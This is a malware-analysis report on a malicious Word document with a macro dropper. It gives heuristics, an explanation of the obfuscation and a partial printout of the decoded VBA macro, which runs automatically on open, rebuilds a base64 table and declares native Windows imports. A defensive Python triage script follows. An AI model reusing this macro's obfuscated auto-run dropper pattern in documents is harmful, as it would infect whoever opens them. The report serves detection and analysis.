Verdict: MALICIOUS
Risk Score: 162
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment
The file is a Word document (ThisDocument module, derived from the Normal template) containing a VBA macro that runs automatically when the document is opened, via a Document_Open handler. The code is heavily obfuscated: meaningless string assignments, arithmetic noise (65 - 63 + 7842), discarded Pmt() calls, a Day(#12/5/2013#) stored into a form control, and #If blocks whose arithmetic always reduces to a test of the Win64 constant, so that LongPtr declarations are used under 64-bit Office and Long under 32-bit. Stripped of the padding, the visible logic reads the name of the selected item of a control on the goodkinghenry UserForm, runs it through helper functions (the maggoty.exploration table maps the standard base64 alphabet to its 6-bit values, so the string is base64-style encoded data), and passes the result to native Windows functions imported with Declare PtrSafe statements. The one import visible before the preview truncates names its library with a trailing space ("Shlwapi.dll "), which defeats naive exact-string matching, and aliases SleepConditionVariableSRW, an API exported by kernel32.dll rather than Shlwapi, so it is likely a decoy; the live imports fall in the truncated part. This is consistent with a dropper that stages and executes a secondary payload, and the ClamAV detection Doc.Dropper.Agent-6357884-0 supports that classification.
Heuristics (5)
- ClamAV: Doc.Dropper.Agent-6357884-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6357884-0
- VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]: Document contains VBA macro code
- Document_Open macro [high, OLE_VBA_DOCOPEN]: Document_Open macro (runs without user interaction when the document is opened)
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All eight URLs below were found in document text (OLE body) and are XMP/RDF, Dublin Core and DrawingML namespace identifiers from embedded image and drawing metadata, not network indicators reached by the macro:
  - http://ns.adobe.com/xap/1.0/
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://ns.adobe.com/photoshop/1.0/
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef#
  - http://schemas.openxmlformats.org/drawingml/2006/main
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 41417 bytes | 17ac33e1653e8caa3c59f09a97ecfc140961c3157dd35bfafbda30d748c79c39 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub eloquence()
Dim montserration As String
Dim pampering As String
goodkinghenry.scathful.Value = Day(#12/5/2013#)
varday = verjuice = echinops
abraham = "smuggler"
corpore = "spurs"
aphyllanthes = "antimicrobial"
ballistic = "argot"
mayan = "bessera"
zephyrs = archduchy
Set liein = goodkinghenry.scathful.SelectedItem
archdukedom = 3
dioxide = 16560
cytoplasm = 167535
Pmt 0, archdukedom, 27926, 18331, 3
unwholesome = liein.Name
forces = 65 - 63 + 7842
campaniform = Right(unwholesome, forces)
hel = pompos.abelia(campaniform)
escritoire = 96
exophagy = 14173
racerunner = 360819
Pmt 0, escritoire, 20888, 39613, 5
sirkar = "guardianship"
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim chelate As String
Dim intercommunion As LongPtr
Dim nothofagus As LongPtr
Dim lividity As Variant
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim madid As Long
Dim nothofagus As Long
Dim jetting As Byte
Dim intercommunion As Long
#End If
pertinence = 14 - 18 + 4
jonquil = "cohere"
plagiarize = "sansculottes"
gale = 52 - 68 + 4112
amenorrhea = 102
ataractic = 27272
astacus = 288492
Pmt 0, amenorrhea, 5571, 50973, 3
aghan = excalibur
tibicen = "feverfew"
acathexis = melanotis
casebook = 65
mandatary = 7593
taut = 569056
Pmt 0, casebook, 13470, 48997, 7
articles = hel
concentrated = "eskimoaleut"
bent = "phlomis"
intercommunion = fifos.caress(articles)
aphididae = "codger"
prose = "tectonics"
#If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then
Dim aborad As String
Dim equisetum As LongPtr
Dim regards As LongPtr
Dim airmail As LongPtr
farflung = 113 - 70 + 2021
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim equisetum As Long
corbeille = 114 - 118 + 785
Dim regards As Long
Dim airmail As Long
farflung = corbeille + 3459
#End If
Dim butacaine As Integer
Dim flowage As String
equisetum = 66 - 7 - 59
nothofagus = intercommunion + farflung
regards = 72 - 77 + 201532
airmail = 20 - 90 + 3570
miwok = chimneystack(regards, equisetum, nothofagus, equisetum, equisetum, equisetum, equisetum)
machiavelian = 120
awry = 37172
spavin = 504175
Pmt 0, machiavelian, 22968, 35841, 4
End Sub
Private Sub Document_Open()
Dim ruddy As String
Dim acinonyx As String
vandal = "battue"
briefly = "cutcherry"
eloquence
expediently = 110 + 4
anoxemia = 13900 + 1
cavaliere = 205450 + 3
Pmt 0, expediently, 39794, 19857, 5
End Sub
Attribute VB_Name = "maggoty"
Function exploration()
Dim adjustment(255) As Byte
nepenthaceae = 102 - 54 + 17
Do While nepenthaceae <= 90 + 1
adjustment(nepenthaceae) = nepenthaceae - 65
nepenthaceae = nepenthaceae + 1
Loop
nepenthaceae = 48
Do While nepenthaceae <= 50 + 8
adjustment(nepenthaceae) = nepenthaceae + 4
nepenthaceae = nepenthaceae + 1
Loop
nepenthaceae = 97
Do While nepenthaceae <= 120 + 3
adjustment(nepenthaceae) = nepenthaceae - 71
nepenthaceae = nepenthaceae + 1
Loop
adjustment(47) = 63
nepenthaceae = 43
adjustment(nepenthaceae) = 60 + 2
exploration = adjustment
End Function
Attribute VB_Name = "goodkinghenry"
Attribute VB_Base = "0{3CAE672C-7924-4EC5-94B4-B3D38609C19B}{37CA9EFC-F940-4287-975A-7CEFB3535807}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "fifos"
#If (9 * 3 + 5) > (8 - 3 * 1) And (Win64) > (28 - 7 * 4) * 2 Then
Public Declare PtrSafe Function daeva Lib "Shlwapi.dll " Alias _
"SleepConditionVariableSRW" (ByVal verre As Any, admonition As Any, marooned As Any, aphyllanthaceae As Any) As LongPtr
Public De
... (truncated)
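The preview above ends before the live imports, but two things are already recoverable by static inspection: the auto-exec entry point and Declare statements can be pulled out with simple pattern matching, and the loops in maggoty.exploration() can be replayed to see what table they build. The following is an added example written for this report, not the analyzer's code and not part of the sample. It replays the exploration() loops literally, checks the resulting table against the standard base64 alphabet, and flags auto-exec procedures and Declare'd imports (including library names padded with whitespace) in VBA source. The SAMPLE_VBA excerpt is constructed from lines in the preview; the regexes and helper names are this example's own assumptions.

```python
"""Static triage helpers for an extracted VBA macro (added example, not the
analyzer's or the sample author's code)."""
import re
import string
from typing import Dict, List

# Constructed excerpt: lines lifted from the macro preview in this report.
SAMPLE_VBA = r'''Private Sub Document_Open()
    eloquence
End Sub
Attribute VB_Name = "fifos"
#If (9 * 3 + 5) > (8 - 3 * 1) And (Win64) > (28 - 7 * 4) * 2 Then
Public Declare PtrSafe Function daeva Lib "Shlwapi.dll " Alias _
"SleepConditionVariableSRW" (ByVal verre As Any, admonition As Any, marooned As Any, aphyllanthaceae As Any) As LongPtr
#End If
'''

# Procedure names Word/Excel run without user interaction (assumed list).
AUTOEXEC_RE = re.compile(
    r'^\s*(?:Private\s+|Public\s+)?Sub\s+'
    r'(Document_Open|Document_Close|AutoOpen|AutoClose|AutoExec|Auto_Open|Workbook_Open)\b',
    re.IGNORECASE | re.MULTILINE)

# Declare [PtrSafe] Function|Sub name Lib "lib" [Alias "real"]; " _" is VBA line continuation.
DECLARE_RE = re.compile(
    r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]*)"'
    r'(?:\s+Alias\s+_?\s*"([^"]*)")?',
    re.IGNORECASE)


def find_autoexec(src: str) -> List[str]:
    """Return the auto-executing procedure names present in VBA source."""
    return AUTOEXEC_RE.findall(src)


def find_declares(src: str) -> List[Dict[str, object]]:
    """Return Declare'd native imports; lib_padded marks names like "Shlwapi.dll "."""
    found = []
    for name, lib, alias in DECLARE_RE.findall(src):
        found.append({
            "vba_name": name,
            "lib": lib,
            "alias": alias or name,
            "lib_padded": lib != lib.strip(),
        })
    return found


def build_exploration_table() -> Dict[int, int]:
    """Replay maggoty.exploration() literally: same loop bounds and arithmetic."""
    table: Dict[int, int] = {}
    n = 102 - 54 + 17            # 65, 'A'
    while n <= 90 + 1:           # through 91 (one past 'Z', harmless)
        table[n] = n - 65        # 'A'..'Z' -> 0..25
        n += 1
    n = 48                       # '0'
    while n <= 50 + 8:           # through 58 (one past '9')
        table[n] = n + 4         # '0'..'9' -> 52..61
        n += 1
    n = 97                       # 'a'
    while n <= 120 + 3:          # through 123 (one past 'z')
        table[n] = n - 71        # 'a'..'z' -> 26..51
        n += 1
    table[47] = 63               # '/' -> 63
    n = 43
    table[n] = 60 + 2            # '+' -> 62
    return table


BASE64_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"


def is_base64_decode_table(table: Dict[int, int]) -> bool:
    """True when every base64 alphabet character maps to its 6-bit value."""
    return all(table.get(ord(c)) == i for i, c in enumerate(BASE64_ALPHABET))


def decode_with_table(table: Dict[int, int], text: str) -> bytes:
    """Decode base64 text using the recovered table; '=' and other non-table
    characters are skipped, so padding and whitespace are tolerated."""
    out = bytearray()
    bits = nbits = 0
    for ch in text:
        v = table.get(ord(ch))
        if v is None:
            continue
        bits = (bits << 6) | v
        nbits += 6
        if nbits >= 8:
            nbits -= 8
            out.append((bits >> nbits) & 0xFF)
            bits &= (1 << nbits) - 1   # keep only the leftover low bits
    return bytes(out)


def triage(src: str) -> Dict[str, object]:
    """One-shot summary used by the usage call below."""
    return {
        "autoexec": find_autoexec(src),
        "declares": find_declares(src),
        "exploration_is_base64": is_base64_decode_table(build_exploration_table()),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_VBA))
    print(decode_with_table(build_exploration_table(), "TWFu"))  # b'Man'
```

Running this against the constructed excerpt reports Document_Open as the entry point, one padded-library Declare aliasing SleepConditionVariableSRW, and confirms the exploration() table is a standard base64 reverse alphabet (the over-run entries for '[', ':' and '{' never occur in valid base64 input). On the full macros.bas, the next step would be to locate the string that reaches this table (the control-name value read in eloquence()) and feed it to decode_with_table to recover the staged payload.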